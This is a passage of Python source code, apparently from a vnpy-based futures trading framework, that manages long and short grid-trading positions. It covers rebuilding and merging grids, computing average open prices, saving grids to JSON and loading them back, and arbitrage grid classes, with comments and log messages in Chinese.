x.volume = x.volume - closeVolume
if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
self.writeCtaLog(u'下网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice, closeVolume-x.volume))
closeVolume = closeVolume - x.volume
self.dnGrids.remove(x)
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
self.upGrids.remove(x)
return
if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位减少:{2}'.format(x.openPrice, x.closePrice,closeVolume))
x.volume = x.volume - closeVolume
if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume-x.volume))
closeVolume = closeVolume - x.volume
self.upGrids.remove(x)
def removeGridById(self,direction, id):
"""移除指定id的网格"""
if id == EMPTY_STRING or len(id) <1:
return
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
if x.id == id:
self.writeCtaLog(u'清除下网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
self.dnGrids.remove(x)
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
if x.id == id:
self.writeCtaLog(u'清除上网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
self.upGrids.remove(x)
def removeGrids(self, direction, priceline, type=EMPTY_STRING):
"""清除价格线以下的网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
if x.openPrice < priceline and not x.orderStatus and not x.openStatus and not x.closeStatus and x.type==type:
self.writeCtaLog(u'清除下网格[open={0}]'.format(x.openPrice))
self.dnGrids.remove(x)
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
if x.openPrice > priceline and not x.orderStatus and not x.openStatus and not x.closeStatus and x.type==type:
self.writeCtaLog(u'清除上网格[open={0}]'.format(x.openPrice))
self.upGrids.remove(x)
def moveGrids(self, direction, pricedelta, type=EMPTY_STRING):
"""按pricedelta平移所有网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
x.openPrice += pricedelta # 开仓价格
if x.closePrice != 0:
x.closePrice += pricedelta # 平仓价格
x.stopPrice += pricedelta # 止损价格
x.type = type # 网格类型标签
# self.openPrices = {} # 套利使用,开仓价格,symbol:price
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
x.openPrice += pricedelta # 开仓价格
if x.closePrice != 0:
x.closePrice += pricedelta # 平仓价格
x.stopPrice += pricedelta # 止损价格
x.type = type # 网格类型标签
# self.openPrices = {} # 套利使用,开仓价格,symbol:price
def rebuildGrids(self, direction, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, midline=EMPTY_FLOAT, upRate=1, dnRate=1, reuse=False, useVariableSteps=False):
"""重新拉网
清除未挂单的网格,
在上轨/下轨位置重新挂单
upRate , 上轨网格高度比率
dnRate, 下轨网格高度比率
"""
result = True
newupline = upline
newdnline = dnline
if self.fixedGrids is True:
if abs(self.fixedGridInitPrice - upline) % self.gridHeight > 0:
newupline = upline - abs(self.fixedGridInitPrice - upline) % self.gridHeight + 2*self.gridHeight # ceil(current value, gridHeight) + gridHeight
newdnline = dnline - abs(self.fixedGridInitPrice - dnline) % self.gridHeight - self.gridHeight # floor(current value, gridHeight) - gridHeight
else:
newupline = upline + self.gridHeight
newdnline = dnline - self.gridHeight
if direction == DIRECTION_SHORT:
self.writeCtaLog(u'DEBUG- rebuildGrids Short, 重新拉网:direction:{},upline:{}({}),dnline:{}({})'.format(direction, upline, newupline, dnline, newdnline))
else:
self.writeCtaLog(u'DEBUG- rebuildGrids Long, 重新拉网:direction:{},upline:{}({}),dnline:{}({})'.format(direction, upline, newupline, dnline, newdnline))
uplineDelta = newupline - upline
dnlineDelta = newdnline - dnline
upline = newupline
dnline = newdnline
# 检查上下网格的高度比率,不能低于0.5
if upRate < 0.5 or dnRate < 0.5:
upRate = max(0.5, upRate)
dnRate = max(0.5, dnRate)
# 计算每个网格的高度。如果使用变高的网格,则每过5格把网格搞的增加(self.gridHeight/2)
gridSteps = [0]*self.maxLots
for i in range(1, self.maxLots, 1):
if useVariableSteps == False:
gridSteps[i] = self.gridHeight * i
else:
j = int(i / 5)
gridSteps[i] = gridSteps[i-1] + self.gridHeight + self.gridHeight / 2 * j
# 重建下网格(向下移动开仓的网格)
if direction == DIRECTION_SHORT:
min_long_price = midline
remove_grids = []
opened_grids = []
temp_dnGrids = []
if self.fixedGrids is True:
# 如果价格没变,不需要重新布网格
if dnline == self.dnGrids[0].openPrice:
self.writeCtaLog(u'DEBUG- rebuildGrids Short, dnline not changed, no need to rebuild.')
result = False
return result
# 重建的网格数量(所有网格)
remainLots = 0
lots = self.maxLots - remainLots
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, dnline))
if lots > 0:
for i in range(0, lots, 1):
# 做空,开仓价为下阻力线-网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
open_price = int((dnline - gridSteps[i+remainLots] * dnRate) / self.minDiff ) * self.minDiff
close_price = int((open_price + self.gridWin * dnRate)/self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
temp_dnGrids.append(grid)
self.writeCtaLog(u'重新拉下网格:[{0}~{1}]'.format(dnline, dnline - gridSteps[-1] * dnRate))
# 移除旧的下网格,保留开仓的网格状态
for m in range(0, len(self.dnGrids)):
x = self.dnGrids[m]
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
temp_dnGrids[m].orderStatus = x.orderStatus
temp_dnGrids[m].orderStatus = x.orderStatus
temp_dnGrids[m].volume = x.volume
temp_dnGrids[m].tradedVolume = x.tradedVolume
temp_dnGrids[m].orderStatus = x.orderStatus
temp_dnGrids[m].orderRef = x.orderRef
temp_dnGrids[m].openStatus = x.openStatus
temp_dnGrids[m].closeStatus = x.closeStatus
temp_dnGrids[m].openDatetime = x.openDatetime
temp_dnGrids[m].orderDatetime = x.orderDatetime
temp_dnGrids[m].lockGrids = x.lockGrids
temp_dnGrids[m].reuse = x.reuse
temp_dnGrids[m].type = x.type
temp_dnGrids[m].openPrices = x.openPrices
temp_dnGrids[m].snapshot = x.snapshot
if x.closePrice > 0:
temp_dnGrids[m].closePrice = x.closePrice + dnlineDelta
else:
temp_dnGrids[m].closePrice = 0
if len(remove_grids) > 0:
self.writeCtaLog(u'清除下网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留下网格[{}]'.format(opened_grids))
for x in self.dnGrids[:]:
self.dnGrids.remove(x)
# self.dnGrids.clear()
self.dnGrids = temp_dnGrids
self.writeCtaLog(u'DEBUG- rebuildGrids Short: lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, dnline, dnline - gridSteps[-1] * dnRate))
else:
# 移除未挂单的下网格
for x in self.dnGrids[:]:
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
self.dnGrids.remove(x)
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
if x.openPrice < min_long_price:
min_long_price = x.openPrice
if len(remove_grids) > 0:
self.writeCtaLog(u'清除下网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留下网格[{}]'.format(opened_grids))
# 需要重建的剩余网格数量
remainLots = len(self.dnGrids)
lots = self.maxLots - remainLots
remainLots = 0 # WJ: correction for the rebuild price
dnline = min(dnline, min_long_price-self.gridHeight*dnRate)
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, dnline))
if lots > 0:
for i in range(0, lots, 1):
# 做空,开仓价为下阻力线-网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
open_price = int((dnline - gridSteps[i+remainLots] * dnRate) / self.minDiff ) * self.minDiff
close_price = int((open_price + self.gridWin * dnRate)/self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
self.dnGrids.append(grid)
self.writeCtaLog(u'重新拉下网格:[{0}~{1}]'.format(dnline, dnline - gridSteps[-1] * dnRate))
self.writeCtaLog(u'DEBUG- rebuildGrids Short, lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, dnline, dnline - gridSteps[-1] * dnRate))
# 重建上网格(向上移动开仓的网格)
if direction == DIRECTION_LONG:
max_short_price = midline # 最高开空价
remove_grids = [] # 移除的网格列表
opened_grids = [] # 已开仓的网格列表 temp_dnGrids = {}
temp_upGrids = []
if self.fixedGrids is True:
# 如果价格没变,不需要重新布网格
if upline == self.upGrids[0].openPrice:
self.writeCtaLog(u'DEBUG- rebuildGrids Long, upline not changed, no need to rebuild.')
result = False
return result
# 重建的网格数量(所有网格)
remainLots = 0
lots = self.maxLots - remainLots
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, upline))
if lots > 0:
# 做多,开仓价为上阻力线+网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
open_price = int((upline + gridSteps[i+remainLots] * upRate) / self.minDiff) * self.minDiff
close_price = int((open_price - self.gridWin * upRate) / self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
temp_upGrids.append(grid)
self.writeCtaLog(u'重新拉上网格:[{0}~{1}]'.format(upline, upline + gridSteps[-1] * upRate))
# 移除旧的上网格,保留开仓的网格状态
for m in range(0, len(self.upGrids)):
x = self.upGrids[m]
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
temp_upGrids[m].orderStatus = x.orderStatus
temp_upGrids[m].orderStatus = x.orderStatus
temp_upGrids[m].volume = x.volume
temp_upGrids[m].tradedVolume = x.tradedVolume
temp_upGrids[m].orderStatus = x.orderStatus
temp_upGrids[m].orderRef = x.orderRef
temp_upGrids[m].openStatus = x.openStatus
temp_upGrids[m].closeStatus = x.closeStatus
temp_upGrids[m].openDatetime = x.openDatetime
temp_upGrids[m].orderDatetime = x.orderDatetime
temp_upGrids[m].lockGrids = x.lockGrids
temp_upGrids[m].reuse = x.reuse
temp_upGrids[m].type = x.type
temp_upGrids[m].openPrices = x.openPrices
temp_upGrids[m].snapshot = x.snapshot
if x.closePrice > 0:
temp_upGrids[m].closePrice = x.closePrice + uplineDelta
else:
temp_upGrids[m].closePrice = 0
if len(remove_grids) > 0:
self.writeCtaLog(u'清除上网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留上网格[{}]'.format(opened_grids))
for x in self.upGrids[:]:
self.upGrids.remove(x)
# self.upGrids.clear()
self.upGrids = temp_upGrids
self.writeCtaLog(u'DEBUG- rebuildGrids Long, lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, upline, upline + gridSteps[-1] * upRate))
else:
# 移除未挂单的上网格
for x in self.upGrids[:]:
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
self.upGrids.remove(x)
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
if x.openPrice > max_short_price:
max_short_price = x.openPrice
if len(remove_grids) > 0:
self.writeCtaLog(u'清除上网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留上网格[{}]'.format(opened_grids))
# 需要重建的剩余网格数量
remainLots = len(self.upGrids)
lots = self.maxLots - remainLots
remainLots = 0 # WJ: correction for the rebuild price
upline = max(upline, max_short_price+self.gridHeight*upRate)
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, upline))
if lots > 0:
# 做多,开仓价为上阻力线+网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
open_price = int((upline + gridSteps[i+remainLots] * upRate) / self.minDiff) * self.minDiff
close_price = int((open_price - self.gridWin * upRate) / self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
self.upGrids.append(grid)
self.writeCtaLog(u'重新拉上网格:[{0}~{1}]'.format(upline, upline + gridSteps[-1] * upRate))
self.writeCtaLog(u'DEBUG- rebuildGrids Long, lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, upline, upline + gridSteps[-1] * upRate))
return result
def recount_avg_open_price(self):
"""计算网格的平均开仓价"""
up_open_list = [x for x in self.upGrids if x.openStatus]
self.max_up_open_price = 0 - sys.maxsize
self.avg_up_open_price = 0 - sys.maxsize
self.min_dn_open_price = sys.maxsize
self.avg_dn_open_price = sys.maxsize
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
for x in up_open_list:
self.max_up_open_price = max(self.max_up_open_price, x.openPrice)
total_price += x.openPrice*x.volume
total_volume += x.volume
if total_volume > 0:
self.avg_up_open_price = total_price/total_volume
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
dn_open_list = [x for x in self.dnGrids if x.openStatus]
for x in dn_open_list:
self.min_dn_open_price = min(self.min_dn_open_price,x.openPrice)
total_price += x.openPrice*x.volume
total_volume += x.volume
if total_volume > 0:
self.avg_dn_open_price = total_price/total_volume
def count_avg_open_price(self, grid_list):
"""计算平均开仓价"""
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
avg_price = EMPTY_FLOAT
for g in grid_list:
total_price += g.openPrice * g.volume
total_volume += g.volume
if total_volume > EMPTY_INT:
avg_price = total_price / total_volume
return avg_price
def combineOpenedGrids(self,direction,type=EMPTY_STRING):
"""合并已开仓的网格"""
total_open_price = EMPTY_FLOAT
total_close_price = EMPTY_FLOAT
total_volume = EMPTY_INT
saved_grid = None
if direction == DIRECTION_SHORT:
opened_short_grids = self.getGrids(direction=direction, opened=True, ordered=False, type = type)
if len(opened_short_grids)<=1:
return
self.writeCtaLog(u'{}个空网格合并为1个'.format(len(opened_short_grids)))
saved_grid = opened_short_grids[-1]
for g in opened_short_grids:
total_open_price += g.openPrice * g.volume
total_close_price += g.closePrice * g.volume
total_volume += g.volume
if g != saved_grid:
self.writeCtaLog(u'删除空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
self.upGrids.remove(g)
else:
self.writeCtaLog(u'保留空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
# 更新网格的开仓价和仓位数量
saved_grid.openPrice = int((total_open_price / total_volume)/self.minDiff)*self.minDiff
saved_grid.volume = total_volume
saved_grid.closePrice = int((total_close_price / total_volume)/self.minDiff)*self.minDiff
self.writeCtaLog(u'合并后空网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
elif direction == DIRECTION_LONG:
opened_long_grids = self.getGrids(direction=direction, opened=True, ordered=False, type=type)
if len(opened_long_grids) <= 1:
return
self.writeCtaLog(u'{}个多网格合并为1个'.format(len(opened_long_grids)))
saved_grid = opened_long_grids[-1]
for g in opened_long_grids:
total_open_price += g.openPrice * g.volume
total_close_price += g.closePrice * g.volume
total_volume += g.volume
if g != saved_grid:
self.writeCtaLog(u'删除多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
self.dnGrids.remove(g)
else:
self.writeCtaLog(u'保留多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
# 更新网格的开仓价和仓位数量
saved_grid.openPrice = int((total_open_price / total_volume) / self.minDiff) * self.minDiff
saved_grid.volume = total_volume
saved_grid.closePrice = int((total_close_price / total_volume) / self.minDiff) * self.minDiff
self.writeCtaLog(
u'合并后多网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
def clearDuplicateGrids(self,direction=EMPTY_STRING,type=EMPTY_STRING):
"""去除重复开仓价的未开仓网格"""
if direction == DIRECTION_SHORT or direction==EMPTY_STRING:
if len(self.upGrids) < 2:
return
checking_grids = self.getGrids(direction=DIRECTION_SHORT, opened=False,ordered=False,type=type)
if len(checking_grids) < 2:
return
open_price_list = []
remove_grids = []
for g in checking_grids:
if g.openPrice in open_price_list:
remove_grids.append(g)
continue
open_price_list.append(g.openPrice)
for rg in remove_grids:
try:
self.upGrids.remove(rg)
except:
pass
if direction == DIRECTION_LONG or direction==EMPTY_STRING:
if len(self.dnGrids) < 2:
return
checking_grids = self.getGrids(direction=DIRECTION_LONG, opened=False, ordered=False, type=type)
if len(checking_grids) < 2:
return
open_price_list = []
remove_grids = []
for g in checking_grids:
if g.openPrice in open_price_list:
remove_grids.append(g)
continue
open_price_list.append(g.openPrice)
for rg in remove_grids:
try:
self.dnGrids.remove(rg)
except:
pass
def save(self, direction=None):
"""
保存网格至本地Json文件"
2017/11/23 update: 保存时,空的列表也保存
:param direction:
:return:
"""""
# 回测模式不保存
if self.strategy and getattr(self.strategy, 'backtesting', False):
return
# 更新开仓均价
self.recount_avg_open_price()
grids_save_path = self.get_data_folder()
# 确保json名字与策略一致
if self.jsonName != self.strategy.name:
self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
self.jsonName = self.strategy.name
# 移除旧版上/下网格列表
old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
if os.path.exists(old_up_json_file):
try:
os.remove(old_up_json_file)
except:
pass
if os.path.exists(old_dn_json_file):
try:
os.remove(old_dn_json_file)
except:
pass
# 新版网格持久化文件
grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
self.json_file_path = grid_json_file
data = {}
up_grids = []
for grid in self.upGrids:
up_grids.append(grid.toJson())
dn_grids = []
for grid in self.dnGrids:
dn_grids.append(grid.toJson())
data[u'up_grids'] = up_grids
data[u'dn_grids'] = dn_grids
with open(grid_json_file, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
self.writeCtaLog(u'GrideTrade保存文件{}完成'.format(grid_json_file))
def load(self, direction, openStatusFilter=[]):
"""
加载本地Json至网格
:param direction: DIRECTION_SHORT,做空网格;DIRECTION_LONG,做多网格
:param openStatusFilter: 缺省,不做过滤;True,只提取已开仓的数据,False,只提取未开仓的数据
:return:
"""
data = {}
grids_save_path = self.get_data_folder()
if self.jsonName != self.strategy.name:
self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
self.jsonName = self.strategy.name
# 移除旧版上/下网格列表
old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
if os.path.exists(old_up_json_file):
try:
with open(old_up_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['up_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
data['up_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_up_json_file)
except:
pass
if os.path.exists(old_dn_json_file):
try:
with open(old_dn_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['dn_grids'] = json.load(f)
except IOError as ex:
self.writeCtaLog(u'读取网格{}出错,ex:{}'.format(old_dn_json_file,str(ex)))
data['dn_grids'] = []
try: # 移除旧版下网格文件
os.remove(old_dn_json_file)
except:
pass
# 若新版文件不存在,就保存;若存在,就优先使用新版数据文件
grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
if not os.path.exists(grid_json_file):
if len(data) == 0:
data['up_grids'] = []
data['dn_grids'] = []
self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
else:
self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
try:
with open(grid_json_file, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
except Exception as ex:
self.writeCtaLog(u'写入网格文件{}异常:{}'.format(grid_json_file,str(ex)))
else:
# 读取json文件
try:
with open(grid_json_file, 'r', encoding='utf8') as f:
data = json.load(f)
except Exception as ex:
self.writeCtaLog(u'读取网格文件{}异常:{}'.format(grid_json_file,str(ex)))
# 从文件获取数据
json_grids = []
if direction == DIRECTION_SHORT :
json_grids = data['up_grids'] if 'up_grids' in data else []
elif direction == DIRECTION_LONG:
json_grids = data['dn_grids'] if 'dn_grids' in data else []
grids = []
ids = []
for i in json_grids:
closePrice = float(i['closePrice'])
openPrice = float(i['openPrice'])
stopPrice = float(i['stopPrice'])
id = i.get('id')
self.writeCtaLog(u'load Grid:open:{0},close:{1},stop:{2}'.format(openPrice, closePrice, stopPrice))
grid = CtaGrid(direction=i['direction'], openprice=openPrice, closeprice=closePrice,
stopprice=stopPrice, volume=i['volume'])
if id is not None and id not in ids:
grid.id = id
ids.append(id)
grid.orderStatus = i['orderStatus'] # 挂单状态: True,已挂单,False,未挂单
grid.orderRef = i['orderRef'] # OrderId
grid.openStatus = i['openStatus'] # 开仓状态
grid.closeStatus = i['closeStatus'] # 平仓状态
strTime = i['openDatetime']
if strTime == EMPTY_STRING or type(strTime)==type(None):
grid.openDatetime = None
else:
grid.openDatetime = datetime.strptime(strTime, '%Y-%m-%d %H:%M:%S')
try:
grid.tradedVolume = i['tradedVolume'] # 已交易的合约数量
except KeyError:
grid.tradedVolume = EMPTY_INT
try:
grid.lockGrids = i['lockGrids']
except KeyError:
grid.lockGrids = []
try:
grid.type = i['type']
if grid.type == False:
grid.type = EMPTY_STRING
except KeyError:
grid.type = EMPTY_STRING
try:
grid.reuse = i['reuse']
except KeyError:
grid.reuse = False
try:
grid.openPrices = i['openPrices']
except KeyError:
grid.openPrices = {}
try:
grid.snapshot = i['snapshot']
except KeyError:
grid.snapshot = {}
self.writeCtaLog(grid.toStr())
# 增加对开仓状态的过滤,满足某些策略只提取已开仓的网格数据
if len(openStatusFilter) > 0:
if grid.openStatus not in openStatusFilter:
continue
grids.append(grid)
# 更新开仓均价
self.recount_avg_open_price()
return grids
def get_data_folder(self):
"""获取数据目录"""
# 工作目录
currentFolder = os.path.abspath(os.path.join(os.getcwd(), u'data'))
if os.path.isdir(currentFolder):
# 如果工作目录下,存在data子目录,就使用data子目录
return currentFolder
else:
# 否则,使用缺省保存目录 vnpy/trader/app/ctaStrategy/data
return os.path.abspath(os.path.join(os.path.dirname(__file__), u'data'))
def changeStrategyName(self, old_name, new_name):
"""
在线更换策略实例名称,需要把Json文件也转移
:param old_name:
:param new_name:
:return:
"""
if old_name == new_name:
self.writeCtaLog(u'更换策略实例名称失败,old:{} =>new:{}'.format(old_name, new_name))
return
data_folder = self.get_data_folder()
self.jsonName = new_name
# 旧文件
old_up_json_file = os.path.join(data_folder, u'{0}_upGrids.json'.format(old_name))
old_dn_json_file = os.path.join(data_folder, u'{0}_dnGrids.json'.format(old_name))
old_json_file = os.path.join(data_folder, u'{0}_Grids.json'.format(old_name))
# 新文件
self.json_file_path = os.path.join(data_folder, u'{0}_Grids.json'.format(new_name))
if os.path.isfile(self.json_file_path): # 新文件若存在,移除
try:
os.remove(self.json_file_path)
except Exception as ex:
self.writeCtaLog(u'GridTrade.changeStrategyName 删除文件:{}异常:{}'.format(old_up_json_file,str(ex)))
# 移动文件
if os.path.isfile(old_json_file):
try:
shutil.move(old_json_file, self.json_file_path)
return
except Exception as ex:
self.writeCtaLog(u'GridTrade.changeStrategyName 移动文件:{}=》{}异常:{}'.format(old_up_json_file, self.json_file_path, str(ex)))
else:
data = {}
if os.path.isfile(old_up_json_file):
try:
with open(old_up_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['up_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
data['up_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_up_json_file)
except IOError:
self.writeCtaLog(u'移除网格{}出错'.format(old_up_json_file))
else:
data['up_grids'] = []
if os.path.isfile(old_dn_json_file):
try:
with open(old_dn_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['dn_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_dn_json_file))
data['dn_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_dn_json_file)
except IOError:
self.writeCtaLog(u'移除网格{}出错'.format(old_dn_json_file))
else:
data['dn_grids'] = []
try:
with open(self.json_file_path, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
except IOError as ex:
self.writeCtaLog(u'写入网格文件{}异常:{}'.format(self.json_file_path, str(ex)))
def getJsonFilePath(self):
"""
返回上下网格的文件路径
:return:
"""
return self.json_file_path
def getTypesOfOpenedGrids(self, direction, include_empty=False):
"""
获取开仓的网格类型列表
:param direction:
:param include_empty: 是否包含空值的类型
:return:
"""
grids = self.getOpenedGrids(direction)
type_list = []
for g in grids:
if g.type not in type_list and (g.type !=EMPTY_STRING if not include_empty else True):
type_list.append(g.type)
return type_list
ARBITRAGE_LONG = u'正套'
ARBITRAGE_SHORT = u'反套'
class ArbitrageGrid(object):
"""套利网格"""
def __init__(self,direction, openprice, closeprice, stopprice=EMPTY_FLOAT, type=EMPTY_STRING):
self.leg1 = None
self.leg2 = None
self.id = str(uuid.uuid1())
self.direction = direction # 正套(ARBITRAGE_LONG) 反套(ARBITRAGE_SHORT)
self.openPrice = openprice # 开仓价格/价比
self.closePrice = closeprice # 平仓价格/价比
self.stopPrice = stopprice # 止损价格/价比
self.type = type # 套利类型(自定义)
self.snapshot = {}
def update_leg1(self,grid):
"""
添加腿1
:param grid:
:return:
"""
if isinstance(grid, CtaGrid):
self.leg1 = grid
else:
print(u'leg1 不是CtaGrid类型')
def update_leg2(self, grid):
"""
添加腿2
:param grid:
:return:
"""
if isinstance(grid, CtaGrid):
self.leg2 = grid
else:
print(u'leg2 不是CtaGrid类型')
def toJson(self):
j = OrderedDict()
j['id'] = self.id
j['direction'] = self.direction
j['openPrices'] = self.openPrice
j['closePrice'] = self.closePrice
j['stopPrice'] = self.stopPrice
j['type'] = self.type
j['snapshot'] = self.snapshot # 切片数据
try:
if self.leg1 is not None:
j['leg1'] = self.leg1.toJson()
if self.leg2 is not None:
j['leg2'] = self.leg2.toJson()
except Exception as ex:
print(u'Arbitrage Grid toJson exception:{} {}'.format(str(ex), traceback.format_exc()),file=sys.stderr)
return j
def fromJson(self,j):
if 'id' in j:
self.id = j.get('id')
self.direction = j.get('direction',EMPTY_STRING)
self.openPrice = j.get('openPrice',EMPTY_FLOAT)
self.closePrice = j.get('closePrice',EMPTY_FLOAT)
self.stopPrice = j.get('stopPrice',EMPTY_FLOAT)
self.type = j.get('type',EMPTY_STRING)
self.snapshot = j.get('snapshot',{})
if 'leg1' in j:
if self.leg1 is None:
self.leg1 = CtaGrid(direction=EMPTY_STRING,openprice=EMPTY_FLOAT,closeprice=EMPTY_FLOAT)
self.leg1.fromJson(j.get('leg1'))
if 'leg2' in j:
if self.leg2 is None:
self.leg2 = CtaGrid(direction=EMPTY_STRING,openprice=EMPTY_FLOAT,closeprice=EMPTY_FLOAT)
self.leg2.fromJson(j.get('leg2'))
class ArbitrageTrade(object):
"""
套利交易网格,仅用于持久化记录价差/价比/跨市场/期现套利等
它包含正套网格/反套网格两个队列
"""
def __init__(self, strategy, leg1_settings, leg2_settings):
"""
构造函数
:param strategy: 上层调用策略
"""
self.strategy = strategy
# 交易合约
self.leg1_symbol = leg1_settings.get('vtSymbol', EMPTY_STRING)
self.leg2_symbol = leg2_settings.get('vtSymbol', EMPTY_STRING)
# 交易合约的杠杆比率
self.leg1_size = leg1_settings.get('size', 1)
self.leg2_size = leg2_settings.get('size', 1)
# 正套队列
self.long_list = []
# 反套队列
self.short_list = []
def writeCtaLog(self, log):
"""
写入日志
:param log:
:return:
"""
if self.strategy and hasattr(self.strategy,'writeCtaLog'):
self.strategy.writeCtaLog(log)
else:
print(log)
def writeCtaError(self, log):
"""
写入错误日志
:param log:
:return:
"""
if self.strategy and hasattr(self.strategy, 'writeCtaError'):
self.strategy.writeCtaError(log)
else:
print(log,file=sys.stderr)
def toJson(self):
"""
=> json object
:return:
"""
j = OrderedDict()
j['leg1_symbol'] = self.leg1_symbol
j['leg1_size'] = self.leg1_size
j['long_list'] = [g.toJson() for g in self.long_list]
j['leg2_symbol'] = self.leg2_symbol
j['leg2_size'] = self.leg2_size
j['short_list'] = [g.toJson() for g in self.short_list]
return j
def fromJson(self,j):
"""
从Json格式恢复数据
:param j:
:return:
"""
self.writeCtaLog(u'数据将从Json恢复')
self.leg1_symbol = j.get('leg1_symbol',EMPTY_STRING)
self.leg2_symbol = j.get('leg2_symbol',EMPTY_STRING)
self.leg1_size = j.get('leg1_size',1)
self.leg2_size = j.get('leg2_size',1)
self.long_list = []
